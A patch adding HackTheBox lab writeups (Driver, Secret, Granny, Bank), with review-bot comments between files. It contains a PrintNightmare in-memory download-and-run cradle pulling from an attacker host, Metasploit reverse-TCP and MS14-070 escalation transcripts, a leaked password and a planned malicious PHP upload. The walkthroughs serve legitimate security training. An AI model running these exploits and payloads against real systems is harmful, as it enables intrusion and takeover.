+
+ Data: 47928 bytes of 47928 bytes copied
+
+ Info: Upload successful!
+
+ *Evil-WinRM* PS C:\Users\tony\Documents> .\winPEAS.bat
+
+
+
+` 
+
+Let it run, then we get a hint towards the ConsoleHost_history text file:
+
+
+
+
+ *Evil-WinRM* PS C:\Users\tony\Documents> cat C:\users\tony\appdata\roaming\microsoft\windows\PowerShell\PSReadline\ConsoleHost_history.txt
+ Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'
+
+ ping 1.1.1.1
+ ping 1.1.1.1
+
+
+
+Here we see history file contains a comamnd to add a printer with the RICOH_PCL6 printer driver. So when we look for exploits we find the [CVE-2021-34527](https://github.com/JohnHammond/CVE-2021-34527) local privesc vulnerability:
+
+
+ [term1]
+ *Evil-WinRM* PS C:\programdata\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz> icacls *.dll
+ borderline.dll Everyone:(F)
+
+ colorbalance.dll Everyone:(F)
+
+ headerfooter.dll Everyone:(F)
+
+ jobhook.dll Everyone:(F)
+
+ outputimage.dll Everyone:(F)
+
+ overlaywatermark.dll Everyone:(F)
+
+ popup.dll Everyone:(F)
+
+ printercopyguardpreview.dll Everyone:(F)
+
+ printerpreventioncopypatternpreview.dll Everyone:(F)
+
+ secretnumberingpreview.dll Everyone:(F)
+
+ watermark.dll Everyone:(F)
+
+ watermarkpreview.dll Everyone:(F)
+
+ Successfully processed 12 files; Failed processing 0 files
+
+ [term2]
+ [ 10.10.14.17/23 ] [ /dev/pts/16 ] [~/HTB/Driver]
+ → git clone https://github.com/JohnHammond/CVE-2021-34527
+ Cloning into 'CVE-2021-34527'...
+ remote: Enumerating objects: 17, done.
+ remote: Counting objects: 100% (17/17), done.
+ remote: Compressing objects: 100% (15/15), done.
+ remote: Total 17 (delta 2), reused 17 (delta 2), pack-reused 0
+ Receiving objects: 100% (17/17), 124.90 KiB | 617.00 KiB/s, done.
+ Resolving deltas: 100% (2/2), done.
+
+ [ 10.10.14.17/23 ] [ /dev/pts/16 ] [~/HTB/Driver]
+ → cd CVE-2021-34527
+
+ [ 10.10.14.17/23 ] [ /dev/pts/16 ] [HTB/Driver/CVE-2021-34527]
+ → ls
+ CVE-2021-34527.ps1 nightmare-dll README.md
+
+ [ 10.10.14.17/23 ] [ /dev/pts/16 ] [HTB/Driver/CVE-2021-34527]
+ → cp CVE-2021-34527.ps1 exploit.ps1
+
+ [ 10.10.14.17/23 ] [ /dev/pts/16 ] [HTB/Driver/CVE-2021-34527]
+ → python3 -m http.server 8080
+ Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
+
+
+
+Then download the ps1 exploit onto the box and run it:
+
+
+ *Evil-WinRM* PS C:\Users\tony\Documents> Invoke-webrequest -uri http://10.10.14.17:8080/exploit.ps1 -Outfile exploit.ps1
+ *Evil-WinRM* PS C:\Users\tony\Documents> .\exploit.ps1
+ File C:\Users\tony\Documents\exploit.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
+ At line:1 char:1
+ + .\exploit.ps1
+ + ~~~~~~~~~~~~~
+ + CategoryInfo : SecurityError: (:) [], PSSecurityException
+ + FullyQualifiedErrorId : UnauthorizedAccess
+
+
+
+However it doesn't let us run scripts on the machine, so instead we're going to run it from memory:
+
+
+ *Evil-WinRM* PS C:\Users\tony\Documents> iex(new-object net.webclient).downloadstring('http://10.10.14.17:8080/exploit.ps1')
+ *Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare -NewUser "nihilist" -NewPassword "nihilist123"
+ [+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
+ [+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
+ [+] added user nihilist as local administrator
+ [+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
+
+
+
+And then login as the new user we created:
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/17 ] [HTB/Driver/CVE-2021-34527]
+ → evil-winrm -i driver.htb -u nihilist -p nihilist123
+
+ Evil-WinRM shell v3.4
+
+ Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
+
+ Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\nihilist\Documents> cd ..\..\Administrator\Desktop
+ *Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
+ f3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! we managed to get the root flag!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
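Review bot: the `Conclusion` of this file ends with `Here we can see the progress graph :` and nothing follows, so the image the sentence introduces was not added in this hunk; either add the reference (the `Easy/img/*_graph.png` files added later in this patch look like the intended targets) or drop the sentence. In Part 3 the `icacls *.dll` output in `[term1]` shows `Everyone:(F)` on every DLL of the RICOH driver directory but is never explained; one sentence on why world-writable driver DLLs matter would connect that listing to the CVE-2021-34527 run in `[term2]` and to the `Add-Printer` line found in `ConsoleHost_history.txt`. Smaller points in the same hunk: the evil-winrm connection banner pasted before `upload /home/nothing/HTB/Driver/winPEAS.bat` repeats the one already shown above `whoami` and can be cut to the `upload` and `.\winPEAS.bat` lines; `Here we see history file contains a comamnd to add a printer` should read `Here we see the history file contains a command to add a printer`; and the stray `` ` `` line after `.\winPEAS.bat` plus the garbled `cd De*Evil-WinRM* PS C:\Users\tony> cd Desktop` line are paste leftovers to remove.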
diff --git a/Easy/71.md b/Easy/71.md
new file mode 100644
index 0000000..754fe54
--- /dev/null
+++ b/Easy/71.md
@@ -0,0 +1,275 @@
+# Secret Writeup
+
+
+
+## Introduction :
+
+Secret is an easy box released back in October 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/16 ] [~/HTB/Secret]
+ → nmap -sCV secret.htb
+ Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-01 15:42 CET
+ Nmap scan report for secret.htb (10.129.21.112)
+ Host is up (0.081s latency).
+ Not shown: 997 closed tcp ports (conn-refused)
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 97af61441089b953f0803fd719b1e29c (RSA)
+ | 256 95ed658dcd082b55dd1751311e3e1812 (ECDSA)
+ |_ 256 337bc171d3330f924e835a1f5202935e (ED25519)
+ 80/tcp open http nginx 1.18.0 (Ubuntu)
+ |_http-server-header: nginx/1.18.0 (Ubuntu)
+ |_http-title: DUMB Docs
+ 3000/tcp open http Node.js (Express middleware)
+ |_http-title: DUMB Docs
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 17.30 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate:
+
+
+
+we run ffuf to look for directories on port 80:
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/16 ] [~/HTB/Secret]
+ → ffuf -u http://secret.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -t 50
+
+ /'___\ /'___\ /'___\
+ /\ \__/ /\ \__/ __ __ /\ \__/
+ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
+ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
+ \ \_\ \ \_\ \ \____/ \ \_\
+ \/_/ \/_/ \/___/ \/_/
+
+ v1.5.0 Kali Exclusive
+ ________________________________________________
+
+ :: Method : GET
+ :: URL : http://secret.htb/FUZZ
+ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
+ :: Follow redirects : false
+ :: Calibration : false
+ :: Timeout : 10
+ :: Threads : 50
+ :: Matcher : Response status: 200,204,301,302,307,401
+ ________________________________________________
+
+ api [Status: 200, Size: 93, Words: 12, Lines: 1, Duration: 102ms]
+ api/experiments [Status: 200, Size: 93, Words: 12, Lines: 1, Duration: 103ms]
+ api/experiments/configurations [Status: 200, Size: 93, Words: 12, Lines: 1, Duration: 97ms]
+ assets [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 83ms]
+ docs [Status: 200, Size: 20720, Words: 6752, Lines: 487, Duration: 102ms]
+ download [Status: 301, Size: 183, Words: 7, Lines: 11, Duration: 108ms]
+ :: Progress: [4713/4713] :: Job [1/1] :: 405 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
+
+
+
+Reading the docs we get a hint as to how to use the API to create an account on port 3000:
+
+  
+
+From here, we create an account at **/api/user/register**
+
+
+ POST /api/user/register HTTP/1.1
+ Host: secret.htb:3000
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Referer: http://secret.htb:3000/
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Pragma: no-cache
+ Cache-Control: no-cache
+ Content-Type: application/json
+ Content-Length: 82
+
+ {
+ "name":"nihilist",
+ "email":"nihil@nowhere.com",
+ "password":"nihilist"
+ }
+
+
+
+` 
+
+Then we get the JWT auth-token by going to **/api/user/login/**
+
+
+ POST /api/user/login HTTP/1.1
+ Host: secret.htb:3000
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Referer: http://secret.htb:3000/
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Pragma: no-cache
+ Cache-Control: no-cache
+ Content-Type: application/json
+ Content-Length: 61
+
+ {
+ "email":"nihil@nowhere.com",
+ "password":"nihilist"
+ }
+
+
+` 
+
+So here we have the following JWT token:
+
+
+ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2Mzg4YzViYTU0OTM3ZTA0N2ExYmVmZDYiLCJuYW1lIjoibmloaWxpc3QiLCJlbWFpbCI6Im5paGlsQG5vd2hlcmUuY29tIiwiaWF0IjoxNjY5OTA4MDc2fQ.15gBFxEXh2My4CaXqNT0LR4jYymWsnXx0iRU8PFcKpE
+
+
+
+With it, we can make a request to /api/priv/ :
+
+
+ GET /api/priv HTTP/1.1
+ Host: secret.htb:3000
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+ auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2Mzg4YzViYTU0OTM3ZTA0N2ExYmVmZDYiLCJuYW1lIjoibmloaWxpc3QiLCJlbWFpbCI6Im5paGlsQG5vd2hlcmUuY29tIiwiaWF0IjoxNjY5OTA4MDc2fQ.15gBFxEXh2My4CaXqNT0LR4jYymWsnXx0iRU8PFcKpE
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Referer: http://secret.htb:3000/
+ Connection: close
+ Upgrade-Insecure-Requests: 1
+ Pragma: no-cache
+ Cache-Control: no-cache
+ Content-Type: application/json
+ Content-Length: 0
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
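Review bot: this file is committed unfinished: Part 2 stops at the `GET /api/priv` request with no response shown and no explanation of what the token grants, followed by roughly forty blank `+` lines, and `Part 3 : Getting Root Access` has an empty body before `Conclusion`. Either complete both sections before merging or state in the introduction that the writeup is a draft, so a reader does not take the `/api/priv` request as the end of the path. The JWT pasted after `So here we have the following JWT token:` is also never explained; its header segment decodes to `{"alg":"HS256","typ":"JWT"}` and its payload to the `_id`, `name`, `email` and `iat` fields of the account registered just above, which is the detail a reader needs to follow why `/api/priv` accepts it. Minor points in the same hunk: the stray `` ` `` lines after the register and login requests are paste leftovers, the prose says `/api/user/login/` with a trailing slash while the request line is `POST /api/user/login`, and `Conclusion` again introduces a progress graph that is not referenced.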
diff --git a/Easy/8.md b/Easy/8.md
new file mode 100644
index 0000000..f75cec0
--- /dev/null
+++ b/Easy/8.md
@@ -0,0 +1,335 @@
+# Granny Writeup
+
+
+
+## Introduction :
+
+Granny is an easy box windows box that was released back in April 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Granny] → nmap -sC -sV 10.10.10.15
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-11 17:45 CET
+ Nmap scan report for 10.10.10.15
+ Host is up (0.036s latency).
+ Not shown: 999 filtered ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 6.0
+ | http-methods:
+ |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
+ |_http-server-header: Microsoft-IIS/6.0
+ |_http-title: Under Construction
+ | http-webdav-scan:
+ | Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
+ | Server Type: Microsoft-IIS/6.0
+ | Server Date: Mon, 11 Nov 2019 16:48:07 GMT
+ | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ |_ WebDAV type: Unknown
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 12.76 seconds
+
+
+## **Part 2 : Getting User Access**
+
+As you can see we're dealing with IIS 6.0 which is an outdated version, with a ton of scripts for us to use, so let's fire up msfconsole :
+
+
+ msfconsole
+
+ ___ ____
+ ,-"" `. < HONK >
+ ,' _ e )`-._ / ----
+ / ,' `-._<.===-'
+ / /
+ / ;
+ _ / ;
+ (`._ _.-"" ""--..__,' |
+ <_ `-"" \
+ <`- :
+ (__ <__. ;
+ `-. '-.__. _.' /
+ \ `-.__,-' _,'
+ `._ , /__,-'
+ ""._\__,'< <____
+ | | `----.`.
+ | | \ `.
+ ; |___ \-``
+ \ --<
+ `.`.<
+ `-'
+
+
+
+ =[ metasploit v5.0.74-dev ]
+ + -- --=[ 1969 exploits - 1088 auxiliary - 338 post ]
+ + -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 7 evasion ]
+
+ msf5 > update
+ [*] exec: update
+
+ [*] You have the latest version of Pwntools (4.0.1)
+ msf5 > search scstorage
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
+
+
+ msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15
+ RHOSTS => 10.10.10.15
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.10:4444
+ [*] Sending stage (180291 bytes) to 10.10.10.15
+ [*] Meterpreter session 1 opened (10.10.14.10:4444 -> 10.10.10.15:1036) at 2020-02-19 08:38:49 +0000
+ [*] Sending stage (180291 bytes) to 10.10.10.15
+ [*] Meterpreter session 2 opened (10.10.14.10:4444 -> 10.10.10.15:1037) at 2020-02-19 08:38:51 +0000
+ [-] Exploit aborted due to failure: bad-config: Server did not respond correctly to WebDAV request
+ [*] Exploit completed, but no session was created.
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.10:4444
+ [*] Trying path length 3 to 60 ...
+ [*] Sending stage (180291 bytes) to 10.10.10.15
+ [*] Meterpreter session 3 opened (10.10.14.10:4444 -> 10.10.10.15:1038) at 2020-02-19 08:39:22 +0000
+
+ meterpreter > ps
+
+ Process List
+ ============
+
+ PID PPID Name Arch Session User Path
+ --- ---- ---- ---- ------- ---- ----
+ 0 0 [System Process]
+ 4 0 System
+ 208 348 logon.scr
+ 272 4 smss.exe
+ 324 272 csrss.exe
+ 348 272 winlogon.exe
+ 396 348 services.exe
+ 408 348 lsass.exe
+ 604 396 svchost.exe
+ 676 396 svchost.exe
+ 732 396 svchost.exe
+ 776 396 svchost.exe
+ 796 396 svchost.exe
+ 932 396 spoolsv.exe
+ 960 396 msdtc.exe
+ 1080 396 cisvc.exe
+ 1128 396 svchost.exe
+ 1176 396 inetinfo.exe
+ 1212 396 svchost.exe
+ 1328 396 VGAuthService.exe
+ 1408 396 vmtoolsd.exe
+ 1456 396 svchost.exe
+ 1504 3620 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
+ 1596 396 svchost.exe
+ 1696 396 alg.exe
+ 1824 604 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
+ 1908 396 dllhost.exe
+ 2060 3620 svchost.exe x86 0 C:\WINDOWS\Temp\radA77E9.tmp\svchost.exe
+ 2304 604 wmiprvse.exe
+ 2380 3620 svchost.exe x86 0 C:\WINDOWS\Temp\rad64DF6.tmp\svchost.exe
+ 2928 3620 svchost.exe x86 0 C:\WINDOWS\Temp\rad3C906.tmp\svchost.exe
+ 3396 1080 cidaemon.exe
+ 3440 1080 cidaemon.exe
+ 3480 1080 cidaemon.exe
+ 3620 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
+ 3692 604 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
+
+
+and we get a reverse shell ! but we need to migrate to another process in order to escalate privileges : the process number 1824 looks interesting :
+
+
+
+ meterpreter > migrate 1824
+ [*] Migrating from 1504 to 1824...
+ [*] Migration completed successfully.
+
+ meterpreter > shell
+ Process 2080 created.
+ Channel 3 created.
+ Microsoft Windows [Version 5.2.3790]
+ (C) Copyright 1985-2003 Microsoft Corp.
+
+ C:\WINDOWS\system32>cd ../..
+ ccd ../..
+
+ C:\>d Documents And Settings
+ cd Documents And Settings
+
+ C:\Documents and Settings>cd Administrator
+ cd Administrator
+ Access is denied.
+
+
+And as you can see, we still migrated to NT Authority, but we did not escalate our privileges enough.
+
+## **Part 3 : Getting Root Access**
+
+
+ C:\Documents and Settings>exit
+ meterpreter > background
+ [*] Backgrounding session 3...
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search ms14_070
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/windows/local/ms14_070_tcpip_ioctl 2014-11-11 average Yes MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference
+
+
+ msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use exploit/windows/local/ms14_070_tcpip_ioctl
+ msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set SESSION 3
+ SESSION => 3
+ msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set payload windows/meterpreter/reverse_tcp
+ payload => windows/meterpreter/reverse_tcp
+ msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > show options
+
+ Module options (exploit/windows/local/ms14_070_tcpip_ioctl):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ SESSION 3 yes The session to run this module on.
+
+
+ Payload options (windows/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
+ LHOST yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Windows Server 2003 SP2
+
+
+ msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set LHOST 10.10.14.10
+ LHOST => 10.10.14.10
+ msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run
+
+
+We'll use a local exploit on our backgrounded session, to see if we can escalate privileges.
+
+
+ [*] Started reverse TCP handler on 10.10.14.10:4444
+ [*] Storing the shellcode in memory...
+ [*] Triggering the vulnerability...
+ [*] Checking privileges after exploitation...
+ [+] Exploitation successful!
+ [*] Sending stage (180291 bytes) to 10.10.10.15
+ [*] Meterpreter session 4 opened (10.10.14.10:4444 -> 10.10.10.15:1039) at 2020-02-19 08:44:38 +0000
+
+ meterpreter > shell
+ [-] Unknown command: shell.
+ meterpreter > shell
+ Process 3108 created.
+ Channel 1 created.
+ Microsoft Windows [Version 5.2.3790]
+ (C) Copyright 1985-2003 Microsoft Corp.
+
+ C:\WINDOWS\system32>meterpreter >
+ meterpreter > shell
+ Process 3140 created.
+ Channel 2 created.
+ Microsoft Windows [Version 5.2.3790]
+ (C) Copyright 1985-2003 Microsoft Corp.
+
+ C:\WINDOWS\system32>cd c:\
+ cd c:\
+
+ C:\>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 246C-D7FE
+
+ Directory of C:\
+
+ 04/12/2017 04:27 PM <****DIR> ADFS
+ 04/12/2017 04:04 PM 0 AUTOEXEC.BAT
+ 04/12/2017 04:04 PM 0 CONFIG.SYS
+ 04/12/2017 09:19 PM <****DIR> Documents and Settings
+ 04/12/2017 04:17 PM <****DIR> FPSE_search
+ 04/12/2017 04:17 PM <****DIR> Inetpub
+ 12/24/2017 07:21 PM <****DIR> Program Files
+ 12/24/2017 07:30 PM <****DIR> WINDOWS
+ 04/12/2017 04:05 PM <****DIR> wmpub
+ 2 File(s) 0 bytes
+ 7 Dir(s) 18,090,029,056 bytes free
+
+ C:\>cd Documents and Settings
+ cdcd Documents and Settings
+
+ C:\Documents and Settingcd Administrator
+ cd Administrator
+
+ C:\Documents and Settings\Administrator>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 246C-D7FE
+
+ Directory of C:\Documents and Settings\Administrator
+
+ 04/12/2017 08:48 PM <****DIR> .
+ 04/12/2017 08:48 PM <****DIR> ..
+ 04/12/2017 04:28 PM <****DIR> Desktop
+ 04/12/2017 04:12 PM <****DIR> Favorites
+ 04/12/2017 04:12 PM <****DIR> My Documents
+ 04/12/2017 03:42 PM <****DIR> Start Menu
+ 04/12/2017 03:44 PM 0 Sti_Trace.log
+ 1 File(s) 0 bytes
+ 6 Dir(s) 18,090,029,056 bytes free
+
+ C:\Documents and Settings\Administrator>cd Desktop
+ cd Desktop
+
+ C:\Documents and Settings\Administrator\Desktop>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is 246C-D7FE
+
+ Directory of C:\Documents and Settings\Administrator\Desktop
+
+ 04/12/2017 04:28 PM <****DIR> .
+ 04/12/2017 04:28 PM <****DIR> ..
+ 04/12/2017 09:17 PM 32 root.txt
+ 1 File(s) 32 bytes
+ 2 Dir(s) 18,090,029,056 bytes free
+
+ C:\Documents and Settings\Administrator\Desktop>type root.txt
+ type root.txt
+ aaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ C:\WINDOWS\system32>cd C:\Documents and Settings\Lakis\Desktop
+ cd C:\Documents and Settings\Lakis\Desktop
+
+ C:\Documents and Settings\Lakis\Desktop>type user.txt
+ type user.txt
+
+ 70XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it ! we have been able to root the box, getting both the user and the root flag in one go. :)
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
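Review bot: the `<****DIR>` entries in the three `dir` listings are a conversion artifact for `<DIR>` and should be restored, ideally by putting the terminal transcripts in fenced code blocks so angle brackets survive rendering. The transcripts also carry doubled-echo lines from the pasted shell (`ccd ../..`, `C:\>d Documents And Settings`, `cdcd Documents and Settings`, `C:\Documents and Settingcd Administrator`) that should be reduced to the command as typed, and the prompt jumps from `C:\Documents and Settings\Administrator\Desktop>` back to `C:\WINDOWS\system32>` before the `Lakis\Desktop` step, which suggests two sessions were stitched together and deserves a one-line note. Wording: `Granny is an easy box windows box` duplicates `box`, and `we still migrated to NT Authority, but we did not escalate our privileges enough` is more precise as `NT AUTHORITY\NETWORK SERVICE`, the user shown for PID 1824 in the `ps` output, which is exactly why the `ms14_070_tcpip_ioctl` local exploit is needed in Part 3. `the process number 1824 looks interesting` should also say why: it is a service host with a user and path listed, rather than the `rundll32.exe` child of the `w3wp.exe` worker (PID 1504, PPID 3620) that the exploit landed in.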
diff --git a/Easy/9.md b/Easy/9.md
new file mode 100644
index 0000000..6484073
--- /dev/null
+++ b/Easy/9.md
@@ -0,0 +1,256 @@
+# Bank Writeup
+
+
+
+## Introduction :
+
+Bank is an easy Linux box that was released back in June 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.29
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-14 06:55 CET
+ Nmap scan report for bank.htb (10.10.10.29)
+ Host is up (0.065s latency).
+ Not shown: 997 closed ports
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
+ | 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
+ | 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
+ |_ 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
+ 53/tcp open domain ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
+ | dns-nsid:
+ |_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
+ 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
+ |_http-server-header: Apache/2.4.7 (Ubuntu)
+ | http-title: HTB Bank - Login
+ |_Requested resource was login.php
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 18.18 seconds
+
+
+## **Part 2 : Getting User Access**
+
+First of all we will browse to the Apparent apache 2.4.7 from within our web browser to see if we can find a little more details.
+
+
+
+There is something strange here, our nmap scans told us that we would meet a login.php page The problem is simply that HTB doesn't do DNS so we will need to add 10.10.10.29 to our /etc/hosts file. with the alias **bank.htb**
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist] → nano /etc/hosts
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist] → cat /etc/hosts
+ 10.10.10.29 bank.htb
+ 10.10.10.76 sunday.htb
+ 127.0.0.1 localhost
+ 127.0.1.1 prometheus
+ ::1 localhost ip6-localhost ip6-loopback
+ ff02::1 ip6-allnodes
+ ff02::2 ip6-allrouters
+
+
+Once we browse to the new alias bank.htb , we see that it finally redirects us to the login page **login.php** that our nmap scan picked up.
+
+
+
+To find out which diretories are available for this http service, we run a dirbusting command such as **gobuster**
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist] → gobuster -u http://bank.htb/ -w /usr/share/wordlist
+
+
+Give it some time to run, and looking at the results, we see that the process found the **/balance-transfer/** directory gobuster also found the /uploads/ directory but for now we won't use it, it will be of use later on. We can browse to it from within our web browser, but for this example we will use the lynx command.
+
+
+ λ root [ 10.10.14.48/23 ] [/home/nihilist] → lynx http://bank.htb/balance-transfer/
+
+
+
+
+Here we can see that the page is giving us a bunch of encrypted files that have the exact size of 583 or 584. If we scroll down a bit we will end up seeing that there is one specific file that does not match this 583 size.
+
+
+
+Within lynx we just need to press Enter once the correct hyperlink is selected, and it takes us to an unencrypted account file for the user chris. Revealing his strong password.
+
+
+
+We now have credentials to work with : **chris@bank.htb : !##HTBB4nkP4ssw0rd!##** We will try them onto the login page that our nmap scan picked up before.
+
+
+
+And we are logged in ! we have access to the user christos Christopoulos, the credentials worked on login.php. For our next step we navigate to the php support page that allows us to choose files to submit tickets. We will upload a malicious php file to which we will make sure that the extension ending it is not .php but something else. here we will name it **nihilist.php.htb**
+
+
+
+
